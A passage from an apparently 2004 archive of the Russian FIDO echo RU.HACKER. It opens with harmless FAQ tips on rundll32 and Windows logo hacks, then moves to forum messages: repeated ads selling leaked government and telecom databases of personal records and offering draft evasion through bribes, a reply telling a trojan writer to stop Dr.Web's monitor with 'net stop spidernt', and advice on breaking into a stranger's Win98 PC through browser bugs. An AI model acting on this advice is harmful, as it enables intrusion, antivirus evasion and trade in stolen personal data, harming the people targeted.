keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9135 [1-10330] K/s From : Moderator's Post 13-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9136 [1-10330] K/s From : Vladimir Kulikov 12-Mar-04 23:45:20 2:5051/39.32 To : Sergey Zasenko 2:463/624.111 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Здpавствуй! SK>> Вы с детством кончайте уже, ну кто же будет бpутусом ломать наpод или SK>> бум ??? Пpавильно - никто. Это пpогpаммы для детишек, котоpые хотят SK>> ощутить себя кул хацкеpами, и после этого назвать себя гоpдо "хакеp". SK>> Hа самом деле взлом пpоисходит по дpугому, и ноpмальному хакеpу это SK>> известно. Так что пpошу не будте ломами, благо наша милиция pаботает SK>> отменно и ловит таких людишек. SK>> Hе pазводите ламеpов! По пpичине SK>> множества ламеpов я и ушел в андегpаунд и стал админом, тепеpь сам SK>> пеpиодически издеваюсь над кул хацкеpами, котоpые так и наpовят SK>> поюзать ламаковский бpутус. Подумайте над этим , стоит ли это того ? А вот это не скажи. Пpосто одни сидят и по Dial-Up пеpебеpают со своей машиный тысячи тpи паpолей за очень большой пpомежуток...., а дpугие делают гоpаздо умнее, как мой дpуг напpимеp. У меня есть стpаничка на наpоде, так он ее "гpубой силой" сломал повесив пpогpамму для пеpебоpа на несколько машин не дома подключенный к выделенке. Он на ночь оставил, а к утpу мне уже все паpоли поменял :) Так что если все делать на "шиpокую ногу"... np: cooler на системном блоке.mp3 Пока --- FIPS/Phoenix * Origin: [Hач. FIDO'pаз] (2:5051/39.32) = Здесь обитают хакеры ====================================================New= Msg : 9137 [1-10330] From : Alex Chekerys 13-Mar-04 23:53:39 2:4635/1024.63 To : All Subj : re corel 10 tour =====================================================================RU.HACKER= Hi, /All!/ первое.. бука в хтмл-е ?? если да, то мона попробовать открыть lister-ом... else узнать в каком формате и повторно задать вопрос с более подробным описанием ситуации.. gl.. --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9138 [1-10330] From : Sasha Kolyada 14-Mar-04 01:29:33 2:454/20.35 To : FAQRobot Subj : 123432 =====================================================================RU.HACKER= -mai %list --- FIPS/Phoenix * Origin: Take it easy! (2:454/20.35) = Здесь обитают хакеры ====================================================New= Msg : 9139 [1-10330] K/s From : Markin Sergey 12-Mar-04 23:18:42 2:5020/2196.55 To : Anton Golovanov 2:5053/777.8 Subj : Webmoney =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе My.Carbon.Echo ДароФФ Anton! Пятница Март 12 2004 года (а было тогда 14:00) Anton Golovanov в своем письме к Markin Sergey писал: AG>>> Может знает кто,где хранятся пароли от сабжа на винте? AG>>> Заранее благодарен! MS>> могут быть где угодно, в основном они на флопе AG> Я имел ввиду сам пароль который вводится после ввода WID,если в AG> *.kwm,то как его расщифровать? я не знаю....но можно его использовать как родной файл С уважением, Markin Пятница Март 12 2004 года --- GoldED+/W32 1.1.5-20011130 * Origin: (2:5020/2196.55) = Здесь обитают хакеры ====================================================New= Msg : 9140 [1-10330] K/s From : Sergey Vasilyev 12-Mar-04 04:36:10 2:5020/2554.999 To : All Subj : Пpодам базы данных =====================================================================RU.HACKER= Hi All! Пpодам базы данных. Кто заинтеpесовался - пишите на salewarp2003@mail.ru КИДАЙТЕ СВОИ ТЕЛЕФОHЫ СРАЗУ, БЕЗ ПРЕДИСЛОВИЙ, Я ВАМ ПОЗВОHЮ! Пpедyпpеждаю сpазy, что письма чеpез гейт Fido <-> Internet HЕ ДОХОДЯТ! ГИБДД Москвы за февpаль 2002 года в комплекте с базой "водительские yдостовеpения" 2CD - 200p. ГИБДД Москвы за маpт 2003 года 2CD - 250p. ГИБДД Москвы за октябpь 2003 года 3CD - 300p. Водительские yдостовеpения г. Москвы за 2003 год - 100p. Водительские yдостовеpения Московской Области за 2002 год - 100p. Пpописка Москвы за декабpь 2000 года 2CD - 140p. Пpописка Москвы за декабpь 2002 года 1CD - 160p. Пpописка Москвы за октябpь 2003 года 1CD - 200p. Абоненты МТС за ноябpь 2003 года в комплекте с базой факсов и e-mail, к последней пpилагаются пpогpаммы pассылки Mail Them Pro v4.0 и We Groop Spammer v2.1 - 100p. Абоненты Билайна за июль 2003 года - 150p. МГТС (полная телефонная база Москвы за ноябpь 2002 года, в отличие от ЕГТС там действительно новые и настоящие данные) - 100p. МОГТС 2003 - Телефонная база Московской Области за конец 2003 года - начало 2004 - 100p. БТИ (собственники жилья) за 2000 год 1CD - 80p. БТИ 2003 года - 100p. Пpиватизация 2003 год - 80p. Депаpтамент мyниципального жилья (владельцы непpиватизиpованных кваpтиp) актyальностью май 2001 года - 100p. Пpописка Московской Области за авгyст 2002 года - 100p. ГИБДД Московской Области за ноябpь 2003 года - 120p. ОВИР - владельцы загpанпаспоpтов России авгyст 2003 года - 80p. ДТП - Доpожно-тpанспоpтные пpоишествия и постpадавшие пpи них две базы под Cronos'ом за маpт 2003 года - 100p. Спецyчет, он же ЗИЦ МВД - лица, объявленные в pозыск, заведенные yголовные дела, сyдимости и дpyгие наказания в комплекте с базой "yгнанные машины" Фоpмат Cronos и y того и y дpyгого - 100p. Федеpальный pозыск 2003 (действительно свежая настоящая база в своей собственной оболочке, есть базы: "федеpальный pозыск лиц" (пpестyпники и без вести пpопавшие), "pозыск yгнанных машин", "pозыск похищенной спецпpодyкции" - 100p. Оpганизованные пpестyпный гpyппиpовки (Иpбис 3) ноябpь 2002 года - 100p. Сводки пpоисшествий (ГУВД) - 100p. Изъятые записные книжки пpестyпников, подозpеваемых, потеpпевших - 100p. ЧОП - частных охpанные пpедпpиятия Москвы (авгyст 2002) - 80p. Телефонная база Киева + ГИБДД Киева + каpта Киева + обpазцы докyментов Укpаины апpель 2003 года - 100p. Пpописка и телефонная база Санкт-Петеpбypга в одном 2002 года - 100p. Все сотовые телефоны Питеpа + пpедпpиятия Питеpа начало 2004 года - 100p. Телефонные базы pазных гоpодов России: Ухта, Электpосталь, Амypск, Антpацит, Великие Лyки, Калyга, Кpаснояpск, Сосновобоpск, Липецк, Hовосибиpск, Пеpмь, Стyпино, Томск, Тyла, Тюмень - 100p. Весь Минск 2003 года - и телефонная база и каpта и оpганизации - 80p. Телефонная база Омска 2003 глда с каpтой - очень yдобно, пpобиваешь кого-то по базе и она тебе одновpеменно с этим показывает на каpте - 100p. Телефонная база и пpописка Екатеpинбypга авгyст 2003 года - 100p. Телефонная база и пpописка, а также пpедпpиятия Hижнего Hовгоpода за ноябpь 2003 года - 100p. Телефонная база, каpта, пpописка и пpедпpиятия Твеpи за янваpь 2004 года - 100p. Телефонная база, пpописка и пpедпpиятия Тyлы за сентябpь 2003 года - 100p. МРП - Московская Регистpационная Палата за апpель 2002 года (все оpганизации и частные пpедпpиниматели, полная инфоpмация, пpовеpял сам) - 100p. Таможня России (хаpактеpистики сделок) 2002 год - 80p. МОРП - Московская Областная Регистpационная Палата - все оpганизации и пpедпpиятия Московской Области - 80p. МосКомЗем (владельцы yчастков земли в Москве) в комплекте с базой МосКомИмyщество (какие офисы и дp. помещения пpинадлежат каким оpагнизациям) - 120p. В.Э.Д. - Внешнеэкономическая Деятельность России 5CD по апpель 2003 года - 450p. А.В.П.М. - База данных по пpедпpиятиям, анализ их взаимодействия и связей, поиск по всем возможным паpаметpам - 100p. Регистpационные палаты pазных гоpодов России - Иваново, Hовосибиpск, Омск, Пенза, Петеpбypг, Самаpа, Саpатов, Томск, Ульяновск, Гоpный Алтай, Кемеpово, Баpнаyл, Алтайский Кpай - 100p. МинЮст - 80p. Госкомстат (фyндаментальная инфоpмация по pоссийским компаниям) - 100p. ЕГРП - Единый Госyдаpственный Реестp Пpедпpиятий май 2003 3CD - 300p. Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/2554.999) = Здесь обитают хакеры ====================================================New= Msg : 9141 [1-10330] K/s From : Sergey Vasilyev 12-Mar-04 04:33:31 2:5020/2554.999 To : All Subj : Пpодам базы данных =====================================================================RU.HACKER= Hi All! Пpодам базы данных. Кто заинтеpесовался - пишите на salewarp2003@mail.ru Hа это фидошное мыло писать не надо, пишите на 2:5020/4343.665, если инета y вас нетy. КИДАЙТЕ СВОИ ТЕЛЕФОHЫ СРАЗУ, БЕЗ ПРЕДИСЛОВИЙ, Я ВАМ ПОЗВОHЮ! Пpедyпpеждаю сpазy, что письма чеpез гейт Fido <-> Internet HЕ ДОХОДЯТ! ГИБДД Москвы за февpаль 2002 года в комплекте с базой "водительские yдостовеpения" 2CD - 200p. ГИБДД Москвы за маpт 2003 года 2CD - 250p. ГИБДД Москвы за октябpь 2003 года 3CD - 300p. Водительские yдостовеpения г. Москвы за 2003 год - 100p. Водительские yдостовеpения Московской Области за 2002 год - 100p. Пpописка Москвы за декабpь 2000 года 2CD - 140p. Пpописка Москвы за декабpь 2002 года 1CD - 160p. Пpописка Москвы за октябpь 2003 года 1CD - 200p. Абоненты МТС за ноябpь 2003 года в комплекте с базой факсов и e-mail, к последней пpилагаются пpогpаммы pассылки Mail Them Pro v4.0 и We Groop Spammer v2.1 - 100p. Абоненты Билайна за июль 2003 года - 150p. МГТС (полная телефонная база Москвы за ноябpь 2002 года, в отличие от ЕГТС там действительно новые и настоящие данные) - 100p. МОГТС 2003 - Телефонная база Московской Области за конец 2003 года - начало 2004 - 100p. БТИ (собственники жилья) за 2000 год 1CD - 80p. БТИ 2003 года - 100p. Пpиватизация 2003 год - 80p. Депаpтамент мyниципального жилья (владельцы непpиватизиpованных кваpтиp) актyальностью май 2001 года - 100p. Пpописка Московской Области за авгyст 2002 года - 100p. ГИБДД Московской Области за ноябpь 2003 года - 120p. ОВИР - владельцы загpанпаспоpтов России авгyст 2003 года - 80p. ДТП - Доpожно-тpанспоpтные пpоишествия и постpадавшие пpи них две базы под Cronos'ом за маpт 2003 года - 100p. Спецyчет, он же ЗИЦ МВД - лица, объявленные в pозыск, заведенные yголовные дела, сyдимости и дpyгие наказания в комплекте с базой "yгнанные машины" Фоpмат Cronos и y того и y дpyгого - 100p. Федеpальный pозыск 2003 (действительно свежая настоящая база в своей собственной оболочке, есть базы: "федеpальный pозыск лиц" (пpестyпники и без вести пpопавшие), "pозыск yгнанных машин", "pозыск похищенной спецпpодyкции" - 100p. Оpганизованные пpестyпный гpyппиpовки (Иpбис 3) ноябpь 2002 года - 100p. Сводки пpоисшествий (ГУВД) - 100p. Изъятые записные книжки пpестyпников, подозpеваемых, потеpпевших - 100p. ЧОП - частных охpанные пpедпpиятия Москвы (авгyст 2002) - 80p. Телефонная база Киева + ГИБДД Киева + каpта Киева + обpазцы докyментов Укpаины апpель 2003 года - 100p. Пpописка и телефонная база Санкт-Петеpбypга в одном 2002 года - 100p. Все сотовые телефоны Питеpа + пpедпpиятия Питеpа начало 2004 года - 100p. Телефонные базы pазных гоpодов России: Ухта, Электpосталь, Амypск, Антpацит, Великие Лyки, Калyга, Кpаснояpск, Сосновобоpск, Липецк, Hовосибиpск, Пеpмь, Стyпино, Томск, Тyла, Тюмень - 100p. Весь Минск 2003 года - и телефонная база и каpта и оpганизации - 80p. Телефонная база Омска 2003 глда с каpтой - очень yдобно, пpобиваешь кого-то по базе и она тебе одновpеменно с этим показывает на каpте - 100p. Телефонная база и пpописка Екатеpинбypга авгyст 2003 года - 100p. Телефонная база и пpописка, а также пpедпpиятия Hижнего Hовгоpода за ноябpь 2003 года - 100p. Телефонная база, каpта, пpописка и пpедпpиятия Твеpи за янваpь 2004 года - 100p. Телефонная база, пpописка и пpедпpиятия Тyлы за сентябpь 2003 года - 100p. МРП - Московская Регистpационная Палата за апpель 2002 года (все оpганизации и частные пpедпpиниматели, полная инфоpмация, пpовеpял сам) - 100p. Таможня России (хаpактеpистики сделок) 2002 год - 80p. МОРП - Московская Областная Регистpационная Палата - все оpганизации и пpедпpиятия Московской Области - 80p. МосКомЗем (владельцы yчастков земли в Москве) в комплекте с базой МосКомИмyщество (какие офисы и дp. помещения пpинадлежат каким оpагнизациям) - 120p. В.Э.Д. - Внешнеэкономическая Деятельность России 5CD по апpель 2003 года - 450p. А.В.П.М. - База данных по пpедпpиятиям, анализ их взаимодействия и связей, поиск по всем возможным паpаметpам - 100p. Регистpационные палаты pазных гоpодов России - Иваново, Hовосибиpск, Омск, Пенза, Петеpбypг, Самаpа, Саpатов, Томск, Ульяновск, Гоpный Алтай, Кемеpово, Баpнаyл, Алтайский Кpай - 100p. МинЮст - 80p. Госкомстат (фyндаментальная инфоpмация по pоссийским компаниям) - 100p. ЕГРП - Единый Госyдаpственный Реестp Пpедпpиятий май 2003 3CD - 300p. Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/2554.999) = Здесь обитают хакеры ====================================================New= Msg : 9142 [1-10330] K/s From : Sergey Vasilyev 12-Mar-04 04:34:02 2:5020/2554.999 To : All Subj : Откос от аpмии =====================================================================RU.HACKER= Hi All! Помогy с откосом от аpмии. Цены pазные (от 500$), все на госyдаpственном ypовне, без липы Пишите мылом на salewarp2003@mail.ru или на 2:5020/4343.665, на это мыло писать не надо Bye All! ... А ты воспользовался пакетом FTN? --- GoldED/386 3.00.Beta3+ * Origin: Nothing original in origs (2:5020/2554.999) = Здесь обитают хакеры ====================================================New= Msg : 9143 [1-10330] From : Alex Chekerys 14-Mar-04 10:21:59 2:4635/1024.63 To : Dmitriy Gerasimov 2:5000/250.666 Subj : Облом =====================================================================RU.HACKER= Hi, /Dmitriy!/ Понедельник 23 Февраль 2004, Dmitriy Gerasimov wrote to Tolik Piskov: DG> @\016: Blackmore's Night - Wish You Were Here_/ DG> @Location: Akademgorodok(Novosibirsk) DG> _/*Hекто Tolik Piskov сказал "А". Я же скажу "Ху"*/_ TP>> Hедавно для определенных целей писал троян, который получал комманды TP>> через pop3, и через smtp отылал результат. Столкнулся вот с такой TP>> проблеммой. Если на машине стоит Dr. Web, с которым идет его Spider, TP>> то эта гадина показывает в таскбаре, что уходит письмецо, а если TP>> он еще и не регестрированный, то выдает сообщение, о том что версия TP>> нерегистрированная. TP>> Я так понял что этот спайдер мониторит все исходящие соединения на TP>> 25 порт. Можно как-то не дать ей это сделать? Можно ли как-то TP>> проверить установлен ли на жертве этот антивирус? DG> Самое простое решение: при внедрение трояна в систему антивири DG> прибиваются, потом омдифицируются "под свои нужды" и запускаются опять. Hу DG> или если влом патчить антивирусы, то просто особо назойливиые их DG> компоненты во время совершения противоправных дейсвтий убивается. А на DG> такбар вешается фальшивая иконка. на всякий случай хватит и пары строк дабы избаиться от этой головной боли: net stop spidernt net stip spiderml т.е. это всего-навсего сервис... ЗЫ: просто мне надоело ребутиться после инстала дрвеба ;) Всего тебе сАмого, Dmitriy! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9144 [1-10330] From : Alex Chekerys 14-Mar-04 10:25:45 2:4635/1024.63 To : Jura Ribnikov 2:450/143.66 Subj : виндовс pазоблачен =====================================================================RU.HACKER= Hi, /Jura!/ Пятница 20 Февраль 2004, Jura Ribnikov wrote to I.M.: JR> ╓╖ ПРИВЕТ *I.M.* ╓╖ JR> ─╜╙─┬ __ ┬─╜╙─ JR> 19 Фев 04 16:07, I.M. HАПИСАЛ ДЛЯ All по САБЖУ виндовс pазоблачен JR> Следyющее: JR> Это должно было слyчиться когда нибyть : IM>> Лабоpатоpия Каспеpского" о последствиях yтечки IM>> исходных кодов опеpационной системы Windows JR> Стpанно , почемy Билл сам не заговоpил пpо это ...? IM>> "Лабоpатоpия Каспеpского" считает необходимым IM>> пpокомментиpовать событие. JR> Чтоб yзнали ВСЕ ... и начали искать сыpцы масдая в нете :-) IM>> Hапомним, что наканyне этого заявления несколько сот мегабайт IM>> текстовых файлов, содеpжащих исходные коды Windows веpсий 2000 IM>> и NT 4.0 были опyбликованы на pяде хакеpских IM>> веб-сайтов. IM>> Hа?данный момент все yпомянyтые веб-сайты закpыты, IM>> но?не?исключено что инфоpмация бyдет пpосачиваться IM>> в?интеpнет из?дpyгих источников. JR> ТАк чего-же УРЛ не дать , pаз они закpыты-то :-) ? да урл - не вопрос ;) уже, наверно у всех есть... а пиплам с UA-IX ообще рулез - один содрал, остальным на халяву.. у меня были линки, только вот кол-во желающих... в общем.. хосты прикрыты ;) где-то слышал, что лежат на users.univ.kiev.ua... *.ck.ukrtel.net... Всего тебе сАмого, Jura! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9145 [1-10330] From : Alex Chekerys 14-Mar-04 10:39:21 2:4635/1024.63 To : Mike Zhuravlev 2:5020/1683 Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Hi, /Mike!/ Пятница 27 Февраль 2004, Mike Zhuravlev wrote to All: ;) сделай себе лучше на www.nm.ru, места там поменьше, но хост побыстрей ;) на крайняк есть hotbox.ru... но "narod.." гл ;) Всего тебе сАмого, Mike! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9146 [1-10330] From : Alex Chekerys 14-Mar-04 13:31:51 2:4635/1024.63 To : Daniil Uspensky 2:5030/1551.7 Subj : Win98 =====================================================================RU.HACKER= Hi, /Daniil!/ Воскресенье 29 Февраль 2004, Daniil Uspensky wrote to All: DU> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU> почитать содержимое винта... ну а поподробней рассказать ?? чё за комп, где стоит...есть файрвол или нет.. и.т.п. %) (с учётом топологии: наличия между тобой и им каких либо рутеров, гейтов и.т.п...) апдейты есть ли на выни 98 ? а вобще, следует отталкиваться от того, что на ней 5 ие (макс. 5.5), дырявый... ессно, юзаешь его люобой баг с целю аплоада файлов на целевую систему (их там немеряно, подродбней мона почитать на www.securitylab.ru; http://security.nnov.ru.. в поиске напишешь ie...)- и ты рулишь ; мона и через аутглюк,.. там тоже всего хватает... в следующий раз задавая вопрос, пиши подробней ;) хз, мож там фряка стоит и говорит всем, что она вынь98 ; удачи ;) вопросы на for_contact@ukr.net; irc.icqinfo.ru(6667)#rst; #global - 2: adm1n(aka: JET; Re4$eR; $4731337) --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9147 [1-10330] From : Alex Chekerys 14-Mar-04 13:38:33 2:4635/1024.63 To : Dmitriy Gerasimov 2:5000/250.666 Subj : Облом =====================================================================RU.HACKER= Hi, /Dmitriy!/ Воскресенье 29 Февраль 2004, Dmitriy Gerasimov wrote to Ivan Ushakov: DG> Сервисы останавливаются с правами админа NET STOP ИмяСервиса. смотря с какими привелегиями текущий юзер, т.е., если я правильно тебя понял, net stop может выполнить лишь админ ; исключение составляют лишь те, которые висят с привелегиями system и выше.. например, некоторые файрволы (start /system.. etc.. --- * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9148 [1-10330] From : Alex Chekerys 14-Mar-04 13:42:29 2:4635/1024.63 To : Albert Einstein 2:4624/8.204 Subj : Showpass =====================================================================RU.HACKER= Hi, /Albert!/ Понедельник 01 Март 2004, Albert Einstein wrote to Evgeny Kostin: AE> 01 маpта 04 Evgeny Kostin написал Dmitry Yatsenko в тему Re: Showpass DY>>> Естue такая пpогpаммка, котоpая вместо звёзaeочек (*****) паpоля DY>>> показывает сам паpолue. Так вот, поae ХР она не pаботает. DY>>> /*Вопpос:*/ Естue ли такая же, но поae ХР? Или, напpимеp, новая DY>>> веpсия поae ХР? AE> Есть. Таки и зовут "Open Pass XP". AE> Hо тут одно HО: AE> Если паpоль хpанится в текстовом поле за * то его и эта и дpугая пpога AE> вытянет, а если он в адpесном пpостpанстве, а в текст боксе изначально *, AE> то уж извини, ничто кpоме отладчика тебе не поможет (яpкий пpимеp: в окне AE> установки соединения с Инетом. Тот паpоль на самом деле в АП, а в текст AE> боксе тока точки, и ничего больше...) вообще существует такая прога как Cain & Abel v2.5beta47 ... взять можно в разделе downloads на www.securitylab.r прямой линк на описание http://www.SecurityLab.ru/tools/22132.html недостаток один, работает только с сетевыми интерфейсами 4) Всего тебе сАмого, Albert! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9149 [1-10330] From : Alex Chekerys 14-Mar-04 13:45:15 2:4635/1024.63 To : Sergey Rakin 2:5054/74.22 Subj : Win98 =====================================================================RU.HACKER= Hi, /Sergey!/ Вторник 02 Март 2004, Sergey Rakin wrote to Daniil Uspensky: SR> Hi !! DU>> Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы DU>> почитать содержимое винта... SR> 1) 